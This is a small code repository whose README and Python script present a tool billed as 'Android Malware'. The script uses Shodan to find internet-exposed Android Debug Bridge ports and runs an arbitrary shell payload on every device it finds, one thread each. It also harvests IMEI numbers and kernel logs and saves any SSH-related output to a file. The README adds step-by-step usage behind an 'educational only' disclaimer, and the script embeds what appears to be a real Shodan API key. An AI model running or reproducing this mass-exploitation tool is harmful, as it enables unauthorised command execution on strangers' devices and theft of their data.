├── requirements.txt
├── README.md
└── main.py


/requirements.txt:
--------------------------------------------------------------------------------
1 | shodan
2 | colorama
3 | adb-shell
4 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ![Proof of concept](https://media.discordapp.net/attachments/1173743190973628457/1286960080947908658/image.png?ex=66efce79&is=66ee7cf9&hm=65247f3ab943b8ee712d13d2f0895fd4cbe8aafefcf3afa4e1db8c232d49462d&=&format=webp&quality=lossless&width=859&height=482)
 2 | 
 3 | 
 4 | # ADB ANDROID MALWARE POC FOR RESEARCH AND DEVELOPMENT ONLY DO NOT USE THIS TO INFECT DEVICES THAT IS A CRIME!
 5 | 
 6 | The script connects to Android devices using the Android Debug Bridge (ADB) through the Shodan API, which searches for devices with open ADB ports. It starts by importing necessary libraries and initializing the Shodan API with a key. The user is prompted to enter a command payload to execute on the devices. The adb_connection function establishes a TCP connection to the specified device, executes the given command, and retrieves output such as SSH credentials and the device's IMEI number. It also attempts to dump the kernel log, which can contain sensitive information. Any found SSH credentials are saved to a file. The main function, search_and_execute, searches for devices with open ADB ports and creates a new thread for each connection, allowing multiple devices to be processed simultaneously. It handles exceptions to ensure that errors are reported without crashing the script.If you want to specify versions, you can run pip freeze after installing the packages to see the versions currently in your environment, and then adjust the file accordingly. Here’s a command to create the requirements.txt directly from your current environment by typing pip freeze > requirements.txt
 7 | 
 8 | # Android Malware Script
 9 | 
10 | This Python script connects to Android devices using the Android Debug Bridge (ADB) through the Shodan API. It retrieves sensitive information and executes commands on devices with open ADB ports.
11 | 
12 | ## Features
13 | 
14 | - Searches for devices with open ADB ports using Shodan.
15 | - Executes user-defined command payloads.
16 | - Retrieves and saves SSH credentials and IMEI numbers.
17 | - Handles multiple connections concurrently with threading.
18 | 
19 | ## Requirements
20 | 
21 | To run this script, you'll need to install the required dependencies. You can do this by running:
22 | 
23 | ```bash
24 | pip install -r requirements.txt
25 | ```
26 | Usage
27 | Clone the repository
28 | ```bash
29 | git clone https://github.com/SleepTheGod/Android-Malware.git
30 | cd Android-Malware
31 | ```
32 | Open the main.py file and replace the placeholder for the Shodan API key with your actual key.
33 | 
34 | Run the script
35 | ```python
36 | python main.py
37 | ```
38 | Enter the command you want to use as the payload when prompted.
39 | 
40 | Note
41 | This script is intended for educational purposes only. Ensure you have permission to access any devices you connect to.
42 | 
43 | THE CREATOR OF THIS REPO IS NOT RESPONSIBLE for any actions taken with this repository or script.
44 | 


--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
 1 | import threading
 2 | from time import sleep
 3 | from shodan import Shodan
 4 | from colorama import Fore
 5 | from adb_shell.adb_device import AdbDeviceTcp
 6 | 
 7 | # Replace with your actual Shodan API key
 8 | api = Shodan('WB6B7tRAskjlmpVUrYfnU1CVGCIpUs1t')
 9 | payload = input('Enter the command payload to execute: ')
10 | 
11 | def save_ssh_credentials(output, host):
12 |     """
13 |     Extract and save SSH credentials to a file.
14 |     """
15 |     ssh_creds = []
16 | 
17 |     # Check output for SSH credentials
18 |     if "ssh" in output.lower():
19 |         ssh_creds.append(output)
20 | 
21 |     if ssh_creds:
22 |         with open("ssh.txt", "a") as f:
23 |             f.write(f"SSH Credentials from {host}:\n")
24 |             for cred in ssh_creds:
25 |                 f.write(f"{cred}\n")
26 |             f.write("\n")
27 | 
28 | def adb_connection(host, port, payload):
29 |     try:
30 |         print(f'{Fore.GREEN}[ CONNECTING ]{Fore.MAGENTA} {host}{Fore.GREEN}:{Fore.MAGENTA}{port}\n')
31 | 
32 |         # Create an ADB TCP connection to the device
33 |         device = AdbDeviceTcp(host=host, port=port, default_transport_timeout_s=9)
34 |         device.connect(auth_timeout_s=0.5)
35 | 
36 |         # Send the payload command to the connected device
37 |         output = device.shell(command=str(payload))
38 |         print(f'{Fore.CYAN}[ SUCCESS ] Payload Output from {host}:{port}\n{output}\n')
39 | 
40 |         # Save SSH credentials from the payload output
41 |         save_ssh_credentials(output, host)
42 | 
43 |         # Get the IMEI of the Android device
44 |         imei_output = device.shell(command='service call iphonesubinfo 1 | cut -d\' \' -f3 | tr -d "."')
45 |         print(f'{Fore.CYAN}[ SUCCESS ] IMEI from {host}:{port}\n{imei_output.strip()}\n')
46 | 
47 |         # Dump the kernel log (requires root privileges)
48 |         kernel_dump_output = device.shell(command='cat /proc/kmsg')
49 |         print(f'{Fore.CYAN}[ SUCCESS ] Kernel Dump from {host}:{port}\n{kernel_dump_output[:1000]}...\n')  # Print the first 1000 characters
50 | 
51 |         # Save SSH credentials from the kernel dump
52 |         save_ssh_credentials(kernel_dump_output, host)
53 | 
54 |         # Disconnect after execution
55 |         device.close()
56 |     except Exception as e:
57 |         print(f'{Fore.RED}[ ERROR ] Could not connect to {host}:{port}\n{Fore.YELLOW}Reason: {e}\n')
58 | 
59 | def search_and_execute(payload):
60 |     try:
61 |         # Search for devices with open ADB ports (Android Debug Bridge)
62 |         for result in api.search_cursor('"Android Debug Bridge"'):
63 |             try:
64 |                 host = result['ip_str'].rstrip()
65 |                 port = result['port']
66 | 
67 |                 # Start a new thread for each device connection
68 |                 threading.Thread(target=adb_connection, args=(host, port, payload)).start()
69 | 
70 |                 # Small delay to avoid overwhelming threads
71 |                 sleep(0.5)
72 |             except Exception as ex:
73 |                 print(f'{Fore.RED}[ ERROR ] Issue while processing {host}:{port} - {ex}\n')
74 |     except Exception as e:
75 |         print(f'{Fore.RED}[ ERROR ] Shodan API issue: {e}')
76 | 
77 | # Start the main function to search for devices and execute the payload
78 | search_and_execute(payload)
79 | 


--------------------------------------------------------------------------------